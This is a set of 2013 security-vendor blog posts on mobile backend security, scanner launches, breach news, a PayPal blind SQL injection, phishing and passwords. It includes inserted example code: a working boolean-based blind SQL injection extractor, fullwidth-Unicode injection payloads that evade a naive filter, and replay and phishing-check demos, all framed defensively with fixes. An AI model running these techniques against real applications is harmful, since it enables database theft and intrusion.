
RSA 2013: Stay connected with the best talks, security news and giveaways!


RSA 2013 begins today. Whether you are or aren’t able to make the trip this year, there are more ways than ever to stay connected.

Our friends over at Checkmarx created a great site, Where Alice Met Bob, which provides real-time information on the best talks, the latest relevant security news and cool vendor giveaways. The site has a bunch of fun features, including a live video feed from the Checkmarx booth and a chance to register for a Checkmarx giveaway: an RSA care package that includes vendor giveaways and other prizes. Check it out! http://wherealicemetbob.com


Have you met Alice and Bob? Don’t worry, this isn’t a euphemism for something like “What Happens in Vegas stays in Vegas.” That would be Black Hat. Alice and Bob are just good old security lore dating back to 1978. Read RSA’s blog about Alice and Bob. http://blogs.rsa.com/alice-and-bob/

RSA lists a number of ways to stay connected to the conference through social media. http://www.rsaconference.com/events/2013/usa/for-sponsors-and-exhibitors/social-media.htm.

You can also stay connected through your favorite security tweets and blogs. We look forward to a great week! Connect with us @ntobjectives, @dan_kuykendall and @kdinerman.

We also just created a Facebook page. If you want to join us there, http://www.facebook.com/ntobjectives.


Mobile application security: Lock the back door!

Mobile application security

I was excited when Sean Gallagher told me he was writing about what we believe is one of the most important areas of application security risk today: mobile application security. In his recent article for Ars Technica, “Mobile Application Security: Always Keep the Back Door Locked”, Gallagher explains that it is important to address mobile application security because many of the mobile applications we use today access backend middleware and corporate data sources. We have email applications, Twitter front-end applications, even payment and banking applications. These mobile applications carry the same risks we have been fighting in web applications: they enable traffic to pass through normal corporate defenses like network firewalls.

Why mobile applications are vulnerable

There has been a lot of talk about device security, but most mobile applications make server-side calls, and that is really the part that needs securing, because a server-side compromise affects more users and can expose sensitive and costly information.

And since mobile applications are new and businesses are rushing to get them out the door, all too often they aren’t architected and configured with proper security and access controls, leaving them vulnerable to attackers. As Gallagher put it, “Speed (to market) Kills.”

Are mobile application vulnerabilities new?

The reality is that the vulnerabilities showing up in mobile applications aren’t new at all. They are the same old vulnerabilities we have been hunting for over 13 years now: SQL injection, XSS and the like. In my recent post, I called mobile application security the “Where’s Waldo” of application security. Read that post for more on why these vulnerabilities are, as Gallagher puts it, déjà vu.

How easy it is to attack mobile applications

Man in the middle attacks

It’s surprisingly easy to attack mobile applications. I have parked myself in the mall with my laptop and a Wi-Fi Pineapple. The Wi-Fi Pineapple lets me deliver real Internet access with me as the man in the middle. As people join my Wi-Fi network, I can watch the traffic coming from their smartphones without them knowing that their phones are connected through me. And when their applications fetch updates from a server, I see those updates. I can pull data out of the sniffed traffic and, if the application doesn’t have additional controls and protection, use it to attack and access data in the backend systems.

Finding incomplete NONCE usage

Another technique I use is looking for the absence, or ineffective use, of a nonce, a number used once. When building mobile apps, developers should use one-time request tokens: the client holds a secret session token that is used only to derive the nonce, takes the request it is about to send, and computes a value that is valid only for that exact request. Because that value is very hard to recreate for a different request, apps built this way are very hard to replay against.

For people building mobile applications, the nonce technique is fairly well known. It is part of OAuth, which is becoming standard, and it has become part of identity management, but unfortunately not everyone is using it. In normal web use it wasn’t as critical because you have slightly more trust in the communication layer, but with mobile you can’t trust the network at all, and use of the nonce is critical.

I’m seeing many mobile applications that use a nonce for one kind of request but not for another. For example, in an application that front-ends Twitter, the developers might use a nonce for sending tweets but not for reading messages. Since there is no nonce on the read requests, I can use the man-in-the-middle attack described above to sniff a user’s credentials and then read private messages as that user.

In a way it is similar to CSRF protection: it is the mobile equivalent of an anti-CSRF token, and it prevents replay attacks against mobile backends.
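
To make the replay point concrete, here is an added example (not code from the article, from NTOSpider or from any real Twitter client) of a signed-request scheme of the kind described above. The HMAC-SHA256 construction over method, path, body, nonce and timestamp, the endpoint names, the per-session secret and the in-memory nonce cache are all assumptions. The protect_reads switch reproduces the incomplete-nonce mistake: the POST is protected, the GET is not, so a sniffed read request replays cleanly.

```python
import hashlib
import hmac
import secrets
import time
from typing import Dict, Optional, Tuple

# Added example: a signed-request scheme of the kind described above. It is
# not code from the article, from NTOSpider or from any real Twitter client.
# Assumed for illustration: HMAC-SHA256 over method/path/body/nonce/timestamp,
# a per-session secret issued at login, and an in-memory nonce cache.

SESSION_SECRET = b"per-session secret issued at login (constructed)"
NONCE_TTL_SECONDS = 300


def _canonical(method: str, path: str, body: str, nonce: str, ts: int) -> bytes:
    return "\n".join([method, path, body, nonce, str(ts)]).encode()


def sign_request(secret: bytes, method: str, path: str, body: str,
                 now: Optional[int] = None) -> Dict:
    """Client side: bind a fresh nonce and timestamp to this exact request."""
    nonce = secrets.token_hex(16)
    ts = int(time.time()) if now is None else now
    sig = hmac.new(secret, _canonical(method, path, body, nonce, ts),
                   hashlib.sha256).hexdigest()
    return {"method": method, "path": path, "body": body,
            "nonce": nonce, "ts": ts, "sig": sig}


class Backend:
    """Server side: checks the signature and refuses to accept a nonce twice."""

    def __init__(self, secret: bytes, protect_reads: bool, now: Optional[int] = None):
        self.secret = secret
        self.protect_reads = protect_reads   # False reproduces the incomplete-nonce bug
        self.seen: Dict[str, int] = {}       # nonce -> timestamp it was first used
        self.now = int(time.time()) if now is None else now

    def _verify(self, req: Dict) -> bool:
        if abs(self.now - req["ts"]) > NONCE_TTL_SECONDS:
            return False                     # stale: outside the replay window
        # drop expired nonces so the cache stays bounded by the window
        self.seen = {n: t for n, t in self.seen.items()
                     if self.now - t <= NONCE_TTL_SECONDS}
        if req["nonce"] in self.seen:
            return False                     # replay of a request already served
        expected = hmac.new(self.secret,
                            _canonical(req["method"], req["path"], req["body"],
                                       req["nonce"], req["ts"]),
                            hashlib.sha256).hexdigest()
        if not hmac.compare_digest(expected, req["sig"]):
            return False                     # tampered body/path or wrong secret
        self.seen[req["nonce"]] = req["ts"]
        return True

    def handle(self, req: Dict) -> str:
        if req["method"] == "POST" and req["path"] == "/tweets":
            return "posted" if self._verify(req) else "rejected"
        if req["method"] == "GET" and req["path"] == "/messages":
            if self.protect_reads and not self._verify(req):
                return "rejected"
            return "private messages"
        return "not found"


def demo(protect_reads: bool) -> Tuple[str, str, str, str]:
    """Replay and tamper with sniffed requests against both backend variants."""
    now = 1_700_000_000                      # fixed clock keeps the demo deterministic
    srv = Backend(SESSION_SECRET, protect_reads, now=now)
    post = sign_request(SESSION_SECRET, "POST", "/tweets", "hello", now=now)
    first = srv.handle(post)                 # legitimate request
    replay = srv.handle(post)                # same bytes resent by the MITM
    forged = srv.handle(dict(post, body="pwned", nonce=secrets.token_hex(16)))
    read = sign_request(SESSION_SECRET, "GET", "/messages", "", now=now)
    srv.handle(read)                         # legitimate read
    read_replay = srv.handle(read)           # succeeds only when reads are unprotected
    return first, replay, forged, read_replay
```

With protect_reads set, demo returns ("posted", "rejected", "rejected", "rejected"); without it the last element is "private messages", which is exactly the sniff-and-replay of the read channel described above. The timestamp window is what keeps the nonce cache from growing forever; a backend that checks nonces without also bounding them by time has to remember every nonce it has ever seen.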

Thanks again for the great article, Sean, and for raising awareness of this important issue. Since the article was published, we launched NTOSpider 6.0, which is capable of reading mobile traffic and testing it for vulnerabilities. NTOSpider 6.0 allows you to scan the server-side calls made by mobile applications.

NTOSpider 6 – http://www.ntobjectives.com/security-software/ntospider-application-security-scanner/

Article: http://arstechnica.com/security/2013/02/mobile-app-security-always-keep-the-back-door-locked/


Announcing NTOSpider 6 – Now scanning mobile, web services, and CSRF

I am very happy to announce the delivery of NTOSpider 6, the first and only dynamic application security scanner available that is capable of effectively testing modern mobile and web applications that leverage new technologies like REST, AJAX, JSON and GWT. NTOSpider delivers more comprehensive application coverage and sophisticated attack methodologies than any other solution available. Most importantly, NTOSpider delivers the best rates in the industry for the elimination of false positive and false negative findings.


NTOSpider 6 is a next-generation dynamic application security testing (DAST) solution that includes a proprietary Universal Translator technology, which translates these various formats so that the scanner can automatically crawl them and detect and attack the vulnerabilities that exist in modern applications.

NTOSpider 6

  • More accurate (broader coverage of new technologies with fewer false positives and false negatives)
  • More automated (the most automated solution available with the most sophisticated attack technologies)
  • More cutting-edge (automates testing of new technologies used in HTML5, RIA and mobile apps)

Benefits of NTOSpider 6

  • Broader coverage of complex, modern applications with more automation and minimal per scan manpower
    • Mobile & Web Services – Enables simulated attacks of web & mobile back-end services by detecting rich client traffic to decode & attack popular formats: JSON, REST, Flash Remoting (AMF), SOAP, & XML
    • RIA – Dynamically crawls & attacks rich client traffic including AJAX, JQuery, GWT
  • Supports CSRF protected sites – token detection to enable collection & use of valid tokens during each attack
  • Increased level of automation – Execute repeatable, rapid & comprehensive automated application security testing
  • Reduces risk – Systematically reduce risk more effectively by leveraging a more automated process
  • Frees pen testers – Free pen testers to test the parts of the application that require manual testing like business logic

I’m on the phone every day with customers and security professionals who are struggling to keep up with rapidly proliferating applications and vulnerabilities. The spread of mobile applications, web services and complex Rich Internet Applications (RIA) has made a bad situation worse. Because the web application scanner industry has not kept pace with these new formats, security teams have been forced to test new applications manually, which is time consuming, a drain on resources and insufficient for understanding risk.

Rather than rely solely on manual testing for these technologies, security experts can leverage NTOSpider to automatically test more of their applications than ever before, including the nine technologies we find to be the most common in today’s RIA, HTML5, mobile and complex applications. Each is detailed in our recent white paper, which describes how and why these technologies create challenges for web scanners and provides step-by-step instructions for how security professionals can determine whether their scanners are effectively scanning and attacking these newer technologies.

I invite security researchers and experts who want to stay current against modern applications and try the most accurate and automated solution available to request a free trial of NTOSpider 6!

Read the press release on NTOSpider 6.


Surviving the Week 2/1/13 – Ruby on Rails – JSON Parser Vulnerability

Ruby on Rails – JSON Parser Vulnerability


The Rails JSON parser converted JSON into YAML and handed the result to the YAML parser, which will happily instantiate arbitrary Ruby objects from attacker-controlled input. The fix replaces that YAML backend (yaml.rb). This is far too similar to the earlier CVE-2013-0156 parameter-parsing vulnerability, so expect far more exploits in the wild. http://viamsec.com/blog/2013/01/ruby-on-rails-json-parser-vulnerability/

XSS Attacks Spike in Q4 2012

FireHost, a secure cloud hosting company, released statistics on Q4 2012 web application attacks last week. The report details both the type and the number of attacks hitting its servers in the U.S. and Europe between October and December 2012.

FireHost reports statistics like these quarterly, with a focus on what it calls “The Superfecta”, the four attack types it considers most dangerous.

FireHost reported that cross-site scripting and SQL injection attacks became more prevalent since the third quarter of 2012, with cross-site scripting (XSS) leading the way in terms of attack volume.

http://www.securityweek.com/xss-attacks-spike-q4-2012-firehost

Test your application with NTOSpider to find these vulnerabilities. NTOSpider produces a separate report for XSS that lets you drill into each finding and reproduce the vulnerability.

Unicode Security Testing Library

Chris Weber announced on his blog last week that he has released a small utility library, unicode-hax that is now available on Github.  When it comes to testing string input to find bugs, or vulnerabilities, Unicode can be a tester’s best friend.  Strings are not simple things for software engineers – they require a lot of planning – buffers, encodings, transmission, and storage are just a few concerns. Chris wanted to answer some of the common questions people ask like:

  • What characters should I use for testing?
  • Which ones flip text around?
  • Which ones cause problems?
  • Which one maps to an apostrophe for SQL injection, or a less-than sign for XSS?

As Chris said, “Happy Bug Hunting!”

http://web.lookout.net/2013/01/unicode-security-testing-library.html

To avoid the pain of generating these permutations by hand, use NTOSpider. NTOSpider fuzzes the application not only with Unicode characters but with several other encodings as well.
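
As an added example (not part of unicode-hax or of this post), the following shows why Chris’s last question matters: a filter that blocks the ASCII apostrophe and angle brackets passes fullwidth look-alikes that NFKC normalisation, or a lenient downstream best-fit conversion, turns back into the characters an injection needs. The naive filter and the test strings are constructed for illustration; the scanning helper enumerates such characters from the standard library’s Unicode tables rather than from a fixed list, and the last helper answers the “which ones flip text around” question.

```python
import unicodedata
from typing import Dict, List

# Added example, not code from the unicode-hax library or from this post.
# The toy filter, the candidate strings and the scan range are constructed.

BLOCKED = set("'\"<>")          # what a naive injection filter refuses


def naive_filter_allows(s: str) -> bool:
    """Pre-normalisation check: the kind of filter this trick bypasses."""
    return not any(ch in BLOCKED for ch in s)


def normalizes_to(ch: str, target: str) -> bool:
    """True if NFKC turns ch into exactly the ASCII string target."""
    return unicodedata.normalize("NFKC", ch) == target


def find_lookalikes(target: str, start: int = 0x80, end: int = 0x10000) -> List[str]:
    """Scan the Basic Multilingual Plane for code points whose NFKC form is target."""
    hits = []
    for cp in range(start, end):
        ch = chr(cp)
        if normalizes_to(ch, target):
            hits.append("U+%04X %s" % (cp, unicodedata.name(ch, "?")))
    return hits


def bidi_override_chars(s: str) -> List[str]:
    """Characters that change rendering direction (RLO/LRO and the embeddings/isolates)."""
    return [ch for ch in s if unicodedata.bidirectional(ch) in
            ("RLO", "LRO", "RLE", "LRE", "RLI", "LRI", "FSI")]


def bypass_demo() -> Dict[str, object]:
    """Constructed payloads: fullwidth apostrophe / angle brackets pass the filter,
    then NFKC hands the backend the ASCII originals."""
    sqli = "\uFF07 OR 1=1--"        # U+FF07 FULLWIDTH APOSTROPHE
    xss = "\uFF1Cscript\uFF1E"      # U+FF1C / U+FF1E FULLWIDTH LESS-THAN / GREATER-THAN
    return {
        "sqli_passes_filter": naive_filter_allows(sqli),
        "sqli_after_nfkc": unicodedata.normalize("NFKC", sqli),
        "xss_passes_filter": naive_filter_allows(xss),
        "xss_after_nfkc": unicodedata.normalize("NFKC", xss),
        # a right-to-left override hiding the real extension of "file[RLO]gpj.exe"
        "rlo_present": len(bidi_override_chars("file\u202Egpj.exe")) == 1,
    }
```

The practical rule this illustrates: normalise first, then validate, and treat anything whose NFKC form differs from its input as interesting. find_lookalikes("'") and find_lookalikes("<") give you the candidate list for the apostrophe and less-than cases; the fullwidth (U+FFxx) and small-form (U+FExx) variants are the usual suspects.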

Multiple Vulnerabilities

CurvyCorners Cross Site Scripting – http://packetstormsecurity.com/files/119814
gpEasy 3.5.2 Cross Site Scripting – http://packetstormsecurity.com/files/119805
ImageCMS 4.0.0b SQL Injection – http://packetstormsecurity.com/files/119806
SonicWALL GMS 6 Arbitrary File Upload – http://packetstormsecurity.com/files/119808
Kohana Framework 2.3.3 Directory Traversal – http://packetstormsecurity.com/files/119870


Tweet that, Twitter Hack: Potentially 250,000 users compromised

Last week, attackers gained access to Twitter’s internal systems and stole information, compromising roughly 250,000 accounts. In a blog post on Friday, Twitter announced that it had detected unusual access patterns that were identified as unauthorized access attempts to Twitter user data. Twitter reportedly shut down the attack quickly, but revealed that the attackers had gained access to a limited set of user information: usernames, email addresses, session tokens and encrypted/salted versions of passwords.

The following is an image from Twitter’s Blog and @boblord about this matter:

Keeping Our Users Secure

Is this the work of Chinese hackers?

The online attack comes on the heels of recent intrusions into the computer systems of US media and technology companies, including The New York Times and The Wall Street Journal. Both newspapers reported that their computer systems had been infiltrated by China-based hackers. While articles and blogs are speculating that the Twitter attack may be related to those attacks, Twitter did not state this directly. It did, however, reference the recent attacks against The New York Times and The Wall Street Journal. PCMag published a slide show on 10 Targets Hit by Chinese Hackers.

According to @boblord, “This attack was not the work of amateurs, and we do not believe it was an isolated incident. The attackers were extremely sophisticated, and we believe other companies and organizations have also been recently similarly attacked. For that reason we felt that it was important to publicize this attack while we still gather information, and we are helping government and federal law enforcement in their effort to find and prosecute these attackers to make the Internet safer for all users.”

Twitter protecting its users

Twitter has reset the passwords and revoked the session tokens of the affected accounts. Lord urges all users to practice good password hygiene across the internet and to reset their Twitter passwords as well.

Good password hygiene

  • At least 10 characters
  • Mixture of upper, lower case, symbols and numbers
  • Only use each password for one site

For more information on good password hygiene, read Dan’s advice for creating strong passwords.

Twitter did not specify the method hackers used to penetrate its system, but mentioned vulnerabilities related to Java in Safari and Firefox, and echoed Homeland Security’s advisory that users disable Java in their browsers.

Update:
Some media outlets have incorrectly linked this attack to the hacktivist group Anonymous; Twitter itself has said nothing about who the attacker is.


PayPal plugs SQL Injection Hole

Prakhar Prasad, an Indian researcher, found a blind SQL injection vulnerability in the PayPal Notifications application (https://www.paypal-notify.com) as part of PayPal’s bug bounty program. The bug enabled him to access the PayPal Notifications database. The PayPal team patched the vulnerability immediately because of its severity. The Register reports that the flaw was in the module that sends an email confirming the account holder’s email address. Ultimately, this vulnerability could have enabled attackers to steal sensitive information from PayPal’s databases.


This image shows the database name after the injection.


The blind SQL injection vulnerability existed in the PayPal Notifications web application, specifically in the email confirmation module. It allowed remote attackers, or a low-privileged application user, to inject and execute (blind) SQL commands against the affected application’s database.

There are frequent research reports in the news showing that SQL injection remains one of the most prevalent vulnerabilities exploited by attackers. In at least one report, SQL injection was tied for first place with DDoS attacks.
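
What “blind” means in practice, as an added example that is not PayPal’s code, the researcher’s payloads or SQL Invader: the application answers only found/not found, so the attacker extracts data one yes/no question at a time. The schema, data and lookup function below are constructed on an in-memory SQLite database; the same boolean-based extraction is run against the vulnerable lookup and against the parameterised version that closes the hole.

```python
import sqlite3
from typing import Callable, Dict

# Added example for illustration. Not PayPal's code, the researcher's
# payloads or SQL Invader; schema and data are constructed.


def build_db() -> sqlite3.Connection:
    con = sqlite3.connect(":memory:")
    con.executescript("""
        CREATE TABLE notify_users (id INTEGER PRIMARY KEY, email TEXT, token TEXT);
        INSERT INTO notify_users VALUES (1, 'alice@example.com', 'S3cr3tT0ken');
    """)
    return con


def confirm_email_vulnerable(con: sqlite3.Connection, email: str) -> bool:
    """Email-confirmation lookup built by string concatenation. The caller only
    learns found / not found; errors and data never reach the attacker."""
    sql = "SELECT id FROM notify_users WHERE email = '" + email + "'"
    try:
        return con.execute(sql).fetchone() is not None
    except sqlite3.Error:
        return False


def confirm_email_fixed(con: sqlite3.Connection, email: str) -> bool:
    """Same lookup with a bound parameter: the input can only ever be a value."""
    return con.execute("SELECT id FROM notify_users WHERE email = ?",
                       (email,)).fetchone() is not None


def blind_extract(oracle: Callable[[str], bool], subquery: str, max_len: int = 32) -> str:
    """Boolean-based blind extraction: for each character position, binary-search
    the code point over printable ASCII using only the found/not-found answer."""
    template = "x' OR unicode(substr((%s),%d,1)) >= %d--"
    result = ""
    for pos in range(1, max_len + 1):
        lo, hi = 32, 126
        if not oracle(template % (subquery, pos, lo)):
            break                          # substr() past the end gives NULL: done
        while lo < hi:
            mid = (lo + hi + 1) // 2
            if oracle(template % (subquery, pos, mid)):
                lo = mid
            else:
                hi = mid - 1
        result += chr(lo)
    return result


def demo() -> Dict[str, str]:
    con = build_db()

    def vuln_oracle(payload: str) -> bool:
        return confirm_email_vulnerable(con, payload)

    def fixed_oracle(payload: str) -> bool:
        return confirm_email_fixed(con, payload)

    return {
        # analogue of "the database name" in the screenshot: first table name
        "table": blind_extract(vuln_oracle,
                               "SELECT name FROM sqlite_master WHERE type='table'"),
        "token": blind_extract(vuln_oracle,
                               "SELECT token FROM notify_users WHERE id=1"),
        # against the parameterised lookup the first question already fails
        "fixed_leaks": blind_extract(fixed_oracle, "SELECT token FROM notify_users"),
    }
```

Each character costs about seven requests here (a binary search over 95 printable values), which is why blind injection is slow but entirely automatable, and why a “found / not found” response is not a safe place to leave a concatenated query.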

SQL Injection free tool

There are many free tools and cheat sheets that help people understand what SQL injection is and how to test for it. SQL Invader is a free tool that automates exploitation of a SQL injection vulnerability once you find it and makes it easy to present the result to your team or CEO. Visit NT OBJECTives’ website to download it by completing a short form.

SQL Injection cheat sheet

In addition, there is a one page SQL Injection cheat sheet that lists the five most popular databases with their default admin credentials. Visit NT OBJECTives’ website to download it by completing a short form.

SQLInvader: http://www.ntobjectives.com/go/nto-sql-invader-free-download/
SQL Injection cheat sheet: http://www.ntobjectives.com/go/sql-injection-cheat-sheet/

Did Twitter set users up for future phishing attacks?

On the morning of the Twitter attack, I received the following email from Twitter (shown as an image in this post):

On one hand, I appreciate that Twitter was up front with their users, but it also bothers me when companies make use of bad practices to solve a security problem.

What Twitter did wrong

The email encourages me to click on a link to fix the problem. Bad bad bad! They should simply have told me to visit twitter.com (unlinked) and instructed me to log in, so that their system could direct me through the process of creating a new password. Yes, in most cases security poses some inconvenience. Users would prefer a direct link, just like we would all like to eat cookies for breakfast.

Because of the way Twitter did this, it will be much easier for a future phishing attack to succeed. This is because:

  • The bad guys are now armed with the exact template they can use in their phishing attack
  • Users will more easily accept this as Twitter’s normal behavior after a security breach

Protect yourself from a phishing attack

Even with the best of intentions, companies will continue to use these bad solutions, which means you must use your own best practices to protect yourself. Here are some simple recommendations to avoid phishing attacks:

  • Be suspicious of any link in your email, and try to avoid clicking on links in emails
  • If you think the link is valid, it’s best to copy the link and examine it before pasting it into your browser.
    • Verify the domain is correct. If the link points to twiiter.com (notice the two i’s), be very, very suspicious!
  • Try visiting the site directly to see if you can resolve the problem. This is what I did for the Twitter incident and it worked perfectly.

Additionally you should be using different complex passwords for each site (see our tips for creating secure passwords) and always approach your use of the internet with caution and the assumption that you are a target of the bad guys.
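
As an added example (not code from this post, and not Twitter’s email), here is the domain check from the second bullet automated: links are pulled out of a message body and each link’s registrable domain is compared with the expected domain, flagging near-misses such as twiiter.com. The sample message, the expected-host list and the two-edit threshold are constructed assumptions; the registrable-domain helper is deliberately simple and does not handle multi-label public suffixes such as co.uk.

```python
import re
from typing import Dict
from urllib.parse import urlparse

# Added example, not from the post. The sample message, the expected-host
# list and the edit-distance threshold are constructed for illustration.

EXPECTED_HOSTS = {"twitter.com"}
URL_RE = re.compile(r"https?://[^\s<>\"']+")


def registrable_domain(host: str) -> str:
    """Last two labels of the host. Fine for .com; a real check would use the
    Public Suffix List so that example.co.uk is not reduced to co.uk."""
    labels = host.lower().rstrip(".").split(".")
    return ".".join(labels[-2:])


def edit_distance(a: str, b: str) -> int:
    """Levenshtein distance, used to spot typo-squats of an expected domain."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]


def classify_link(url: str) -> str:
    """'trusted', 'lookalike' (within two edits of an expected domain) or 'foreign'."""
    host = urlparse(url).hostname or ""
    dom = registrable_domain(host)
    if dom in EXPECTED_HOSTS:
        return "trusted"
    if any(edit_distance(dom, good) <= 2 for good in EXPECTED_HOSTS):
        return "lookalike"
    return "foreign"


def check_email(body: str) -> Dict[str, str]:
    """Map every URL found in the message to its classification."""
    return {url: classify_link(url) for url in URL_RE.findall(body)}


# Constructed message imitating the reset-notice pattern discussed above.
SAMPLE_EMAIL = """\
We reset your password. Please click here to choose a new one:
https://twitter.com/settings/password
The same template as a phisher would send it:
https://twiiter.com/settings/password
https://twitter.com.account-security.example/login
"""
```

The third link is the other common trick: the expected name appears at the front of the hostname, but the registrable domain is account-security.example. Comparing on the registrable domain rather than on “does the URL contain twitter.com” is what catches it.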


Techniques for creating secure passwords

Most people are starting to realize that they need to start using more complex passwords, but generally believe:

complex password = hard to remember

This is not true. The solution I have been using for the last several years makes it easy to remember complex passwords, and even fun! Yeah, I really said fun ;)


Industry guidelines for secure passwords

From the FTC

  • Don’t use your name or birthdate — try to be unpredictable
  • Make your password at least 10 to 12 characters long, and use a mix of letters, numbers, and special characters
  • Don’t use the same password for multiple accounts
  • Keep your passwords in a secure place, and don’t share them with anyone — especially over the phone, in texts, or by email

Microsoft’s password complexity policy requires that a password contain characters from at least 3 of the following 5 categories:

  • Uppercase characters of European languages (A through Z, with diacritic marks, Greek and Cyrillic characters)
  • Lowercase characters of European languages (a through z, sharp-s, with diacritic marks, Greek and Cyrillic characters)
  • Base 10 digits (0 through 9)
  • Nonalphanumeric characters: ~!@#$%^&*_-+=`|\(){}[]:;"'<>,.?/
  • Any Unicode character that is categorized as an alphabetic character but is not uppercase or lowercase. This includes Unicode characters from Asian languages.

Our recommended password creation technique

One of the best ways to create a complex password that is easy to remember is to use a mnemonic, or phrase-based, technique. The one I like best is to come up with a phrase that is easy to remember; something personal to you is best. We will use this phrase as an example: “Dan has the best password advice I have ever seen.”

Then take the first letter of each word in the phrase. For some of the letters use the upper-case version, and some letters can be swapped for a number or symbol that matches (e.g. 3 for e, 1 for i, @ for a, ! for I). The resulting password is: dHtbp@!h3s

Works like this:

  • d – Dan
  • H – has
  • t – the
  • b – best
  • p – password
  • @ – Advice
  • ! – I
  • h – have
  • 3 – ever
  • s – seen

You can then customize this based on the website or service you’re using at the time. For example, if you’re creating a password for Twitter you might pick a phrase such as “I still don’t know why I waste my time on Twitter”, which gives you the password !sdky1WmtoT. Now we are having fun!

Password Managers

I also find that password managers can be a great help. I haven’t studied each one well enough to give recommendations, but I personally use Password Safe (pwsafe.org) because the pwsafe format is supported on many platforms and is generally easy to use.

Mobile App Security – Application Security’s “Where’s Waldo”

As I have discussed in previous posts and at conferences like OWASP AppSecUSA, while the number of attacks continues to increase, the attack techniques aren’t new at all. They are the same old attacks, like SQL injection, showing up in new places, including mobile application services and AJAX applications. Because these newer technologies have exploded in popularity and become mainstream, we keep seeing the same old vulnerabilities popping up in new places. I always say it’s like Where’s Waldo: we simply need to understand the new landscape and start looking for Waldo again.


Over the last several years there has been a major evolution in how applications are built, with new underlying technologies, application architectures and data formats, but have application scanners evolved with them? These new technologies have grown at such a fast rate that we haven’t been able to keep up at either end. On one end, developers aren’t able to build these new applications securely because they are up against deadlines from the business while delivering on new technologies. On the other end, web application scanners were architected in the golden days of web application security, when almost all web applications were static and relatively simple HTML pages. While scanners have never covered, and never will cover, every type of web application, our belief is that they can and should cover as much as possible. Unfortunately, most application security scanners haven’t kept pace with the changing applications.


Over the next few weeks, I’ll be posting a series on these technologies and on how developers, security professionals and application scanning vendors can help close the coverage gap described above, improving both the efficiency (less manual effort) and the effectiveness (more vulnerabilities found) of security efforts.

By the way, a new beta version of our NTOSpider product is currently available. We believe it’s the only scanner that truly begins to address these newer technologies and formats, like AMF, JSON and REST, but feel free to check it out for yourself. We welcome input and feedback.

In this series of posts, I’ll detail the technologies used in modern applications and demonstrate why they create challenges for modern web scanners. In addition, I’ll give you pointers on how you can determine if your application security scanners are effectively scanning and attacking these newer technologies.

We will discuss the following kinds of applications and technologies:

1. RIA & HTML5

  • AJAX applications: JSON (jQuery), REST, GWT (Google Web Toolkit)
  • Flash remoting: AMF
  • HTML5 applications (addressed in subsequent paper)

2. Mobile

  • Backends powered by JSON, REST and other custom formats

3. Web services

  • JSON, REST
  • XML-RPC, SOAP (addressed in subsequent paper)

4. Challenging application workflows

  • Sequences: shopping cart and other strict processes
  • XSRF/CSRF tokens

If you would like to read the full whitepaper on this topic, you can download it here.